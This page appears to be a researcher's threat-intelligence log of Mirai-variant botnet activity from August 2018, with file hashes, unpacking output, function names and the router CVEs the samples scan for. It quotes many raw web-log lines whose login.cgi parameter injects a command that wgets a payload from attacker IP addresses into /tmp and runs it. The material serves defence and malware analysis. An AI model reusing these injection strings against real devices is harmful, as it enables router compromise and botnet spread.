Mirai variants botnets | Joachim De Zutter
August 2018

Exploit attempts in log files:
156.194.137.27 - - [13/Aug/2018:21:33:24 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.67.245/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 0 "-" "LMAO/2.0"
[...]
41.36.80.31 - - [15/Aug/2018:17:45:31 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.67.245/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 0 "-" "LMAO/2.0"
File name: k
File size: 294
MD5: 063ca53f7a8a265baab30624b37b7220
SHA1: 63a7caf49c8d6771d6947c313c24b017c22e71e3
SHA256: 8c8b8f69fb7f37b9c4dc0f1c448be5104bc0cc75b99289e56dc2d88dcf252d80
https://www.virustotal.com/#/file/8c8b8f69fb7f37b9c4dc0f1c448be5104bc0cc75b99289e56dc2d88dcf252d80

File name: arm
File size: 30472
MD5: bbf936893b0e24963d69d0a6713e2110
SHA1: 85acfe2fb0fd8ce2e6f011af42f0b6633199372e
SHA256: d902cda3e4fb4a64eb990b78b6fb1730d90a267ae4c4d2c27ec58bfa5c231c41
https://www.virustotal.com/#/file/d902cda3e4fb4a64eb990b78b6fb1730d90a267ae4c4d2c27ec58bfa5c231c41

File name: arm7
File size: 49068
MD5: 9df0fd7abb2c3f66c4c2a16ecf18b632
SHA1: aa89aa6888bd77ccfb54ca86d9d42f718ad3598a
SHA256: 1874bbdc0c14c94b02df3b8d88ce4476cd1d2bb5330c7af69a3c5dfbeefd4cc2
https://www.virustotal.com/#/file/1874bbdc0c14c94b02df3b8d88ce4476cd1d2bb5330c7af69a3c5dfbeefd4cc2

File name: mips
File size: 30924
MD5: adea9e4cd264d8d9a18902be5446a5c1
SHA1: 7bcfe2250839fabb0faf883ff41ac02240dfb396
SHA256: 0e344513a62220fcfe0ffebf9b722980eb74a155ff2c86e109311f7e3fe7375c
https://www.virustotal.com/#/file/0e344513a62220fcfe0ffebf9b722980eb74a155ff2c86e109311f7e3fe7375c

File name: mipsel
File size: 31848
MD5: 3da4c38d528ed7e1536bc1bcb6df0909
SHA1: 68621923b159ca1d01f90d5538910b5c96fbf199
SHA256: 15dd7db40dfe2cf876ced79c6154044cdee9cd0c9f4ef6d2bfd93b58dbd5a424
https://www.virustotal.com/#/file/15dd7db40dfe2cf876ced79c6154044cdee9cd0c9f4ef6d2bfd93b58dbd5a424

File name: x86_32
File size: 24764
MD5: 172eb85780bb0666b637a91905428651
SHA1: 15f67d7a6143f2891dd0c5c9f6fa32d3fe1044ae
SHA256: 544fc2d51b9c226faeef0828d77e63188f5b818af0d0f26195fff4b508f865d1
https://www.virustotal.com/#/file/544fc2d51b9c226faeef0828d77e63188f5b818af0d0f26195fff4b508f865d1

File name: x86_64
File size: 26232
MD5: d4e28149c301d3545c1e970b3d2c2f07
SHA1: c336672c6937df11902b4354253f54b8fe277d71
SHA256: 65ea5c63bebae33cc3b508c3922584111fc50152cbe53309fd30fe3825e81817
https://www.virustotal.com/#/file/65ea5c63bebae33cc3b508c3922584111fc50152cbe53309fd30fe3825e81817
Exploit attempt in log files:
31.163.60.8 - - [21/Aug/2018:10:00:16 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://209.141.33.86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$ HTTP/1.1" 400 0 "-" "Gemini/2.0"
File name: d
File size: 237
MD5: 477f3614d7126d3074b982ecf08f8617
SHA1: 4edd85ad7b7ee3da7c7b2454c95ae6aa29270751
SHA256: dbc71be7eb1197c3c95c6094a33fa3e8c7bdde7725d77fd8526619ce9be10050
https://www.virustotal.com/#/file/dbc71be7eb1197c3c95c6094a33fa3e8c7bdde7725d77fd8526619ce9be10050

File name: .shinka.mips
File size: 26220
MD5: e09d2aac243fc7341106242cbf11f92c
SHA1: 7692d6f79cca2d052d685e77b9c52d9afdfe6cda
SHA256: e64051a6405ddc840981ccf0d014bd8dbefbc549c0d6f1cad9362fe9f2ee1634
https://www.virustotal.com/#/file/e64051a6405ddc840981ccf0d014bd8dbefbc549c0d6f1cad9362fe9f2ee1634

File name: .shinka.mpsl
File size: 26860
MD5: 2868cfcc540c82fa40051cb24db4a652
SHA1: 68a16162f9b13aa3c0ad0d68f48528409b74c30c
SHA256: 44b4957477852679e355d7b84f23b186240090417777304f9160a9e156e1f3f2
https://www.virustotal.com/#/file/44b4957477852679e355d7b84f23b186240090417777304f9160a9e156e1f3f2
$ upx -d .shinka.mips 
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2013
UPX 3.91        Markus Oberhumer, Laszlo Molnar & John Reiser   Sep 30th 2013

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     83236 <-     26220   31.50%  linux/mipseb   .shinka.mips

Unpacked 1 file.
$ upx -d .shinka.mpsl
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2013
UPX 3.91        Markus Oberhumer, Laszlo Molnar & John Reiser   Sep 30th 2013

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     81816 <-     26860   32.83%  linux/mipsel   .shinka.mpsl

Unpacked 1 file.
File name: .shinka.mips
File size: 80964
MD5: 222a4046bf07711849d86caa4034bf81
SHA1: e33301687ddc5ce8e32818ee9b460558d5a784b6
SHA256: 65209b23d305b77b3ba3ad50de4e2405b6e808042c6d799b3c6495d6b369cbff

File name: .shinka.mpsl
File size: 80968
MD5: 24cdb09ad79555bd44a550ea10761d5d
SHA1: 1fe67916860f18ceabb848eeb22b34cad70d48dc
SHA256: f122033259702a8d4919379eaf1ec1fb522e0db28cb9781a19bce184ca5c59c2
Exploit attempts in logfiles:
41.184.234.53 - - [20/Aug/2018:22:32:14 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://176.32.32.156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 0 "-" "Hakai/2.0"
41.184.234.53 - - [20/Aug/2018:22:32:15 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://176.32.32.156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 0 "-" "Hakai/2.0"
156.201.242.158 - - [21/Aug/2018:05:02:54 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://176.32.32.156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 0 "-" "Hakai/2.0"
...
156.201.242.158 - - [21/Aug/2018:05:03:25 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://176.32.32.156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 0 "-" "Hakai/2.0"
42.118.146.128 - - [22/Aug/2018:08:19:33 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://176.32.32.156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 0 "-" "Hakai/2.0"
42.118.146.128 - - [22/Aug/2018:08:19:35 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://176.32.32.156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 0 "-" "Hakai/2.0"
42.117.104.29 - - [22/Aug/2018:09:42:49 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://176.32.32.156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 0 "-" "Hakai/2.0"
1.52.210.213 - - [22/Aug/2018:09:45:33 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://176.32.32.156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 0 "-" "Hakai/2.0"
156.220.125.174 - - [22/Aug/2018:22:47:20 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://176.32.32.156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 0 "-" "Hakai/2.0"
...
156.220.125.174 - - [22/Aug/2018:22:47:55 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://176.32.32.156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 0 "-" "Hakai/2.0"
File name: bin
File size: 73800
MD5: 5ab32bdead9a6043f0db9ab7809be4f1
SHA1: 76ae22c4b87534397f50d62d4481e57c02e563c1
SHA256: fa588bdc625f5103d4960f5905a9b314a78de8dd35eccdf3e62ca52963148ee3
bin is an ELF for MIPS binary. It's clear that the binary is based on the leaked Mirai source code.
The binary contained variable names and at least the following function names:
checksum_generic
checksum_tcpudp
dlinkscanner_scanner_init
watchdog_maintain
recvLine
sockprintf
szprintf
connectTimeout
initConnection
getOurIP
udpfl00d
stdfl00d
httphex
tcpFl00d
processCmd
main
hnapscanner_scanner_init
huaweiscanner_scanner_init
killer_kill_by_port
killer_init
rand_next
rand_init
realtekscanner_scanner_init
table_retrieve_val
table_lock_val
table_unlock_val
table_init
scanner_init
util_strlen
util_strcpy
util_memcpy
util_zero
util_memsearch
util_atoi
util_fdgets
util_local_addr
util_stristr
util_itoa
The realtekscanner_scanner_init code scans for vulnerable devices to exploit CVE-2014-8361.
The hnapscanner_scanner_init code scans for vulnerabile devices to exploit CVE-2015-2051.
The dlinkscanner_scanner_init code scans for vulnerable devices to exploit a D-Link DSL-2750B router vulnerability.
The huwaiscanner_scanner_init code scans for vulnerable devices to exploit CVE-2017-1725.

Exploit attempts in logfiles:
80.13.255.108 - - [23/Aug/2018:12:25:55 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://209.141.33.86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$ HTTP/1.1" 400 0 "-" "Shinka/1.0"
80.13.255.108 - - [23/Aug/2018:12:25:56 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://209.141.33.86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$ HTTP/1.1" 400 0 "-" "Shinka/1.0"
80.13.255.108 - - [23/Aug/2018:12:25:59 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://209.141.33.86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$ HTTP/1.1" 400 0 "-" "Shinka/1.0"
File name: .shinka.mips
File size: 26220
MD5: 247422a5e57b9032ba228d3d21f14bf5
SHA1: 84468d38f5bb82836e8066d9d3948c13f9c8e45d
SHA256: 00ad20514054639bc5337d9bf673fd875aa5bacd702ce21af760b8cbb9939009
https://www.virustotal.com/#/file/00ad20514054639bc5337d9bf673fd875aa5bacd702ce21af760b8cbb9939009

File name: .shinka.mpsl
File size: 26860
MD5: 340804540c9669dc2575139a43880c3a
SHA1: ac248db8dd8cd8d2682be0bd86e0e54f830c3d7d
SHA256: 9c6c4016b3ab1f50edb12291259d96f9bf6a7ccd3cfa7608dd5ac0dd62e1c719
https://www.virustotal.com/#/file/9c6c4016b3ab1f50edb12291259d96f9bf6a7ccd3cfa7608dd5ac0dd62e1c719
$ upx -d .shinka.mips 
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2013
UPX 3.91        Markus Oberhumer, Laszlo Molnar & John Reiser   Sep 30th 2013

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     83236 <-     26220   31.50%  linux/mipseb   .shinka.mips

Unpacked 1 file.
$ upx -d .shinka.mpsl
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2013
UPX 3.91        Markus Oberhumer, Laszlo Molnar & John Reiser   Sep 30th 2013

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     81816 <-     26860   32.83%  linux/mipsel   .shinka.mpsl

Unpacked 1 file.
The only difference between the unpacked .shinka.mips and .shinka.mpsl with the versions mentioned above appears to be a changed User-Agent from Gemini/2.0 to Shinka/1.0.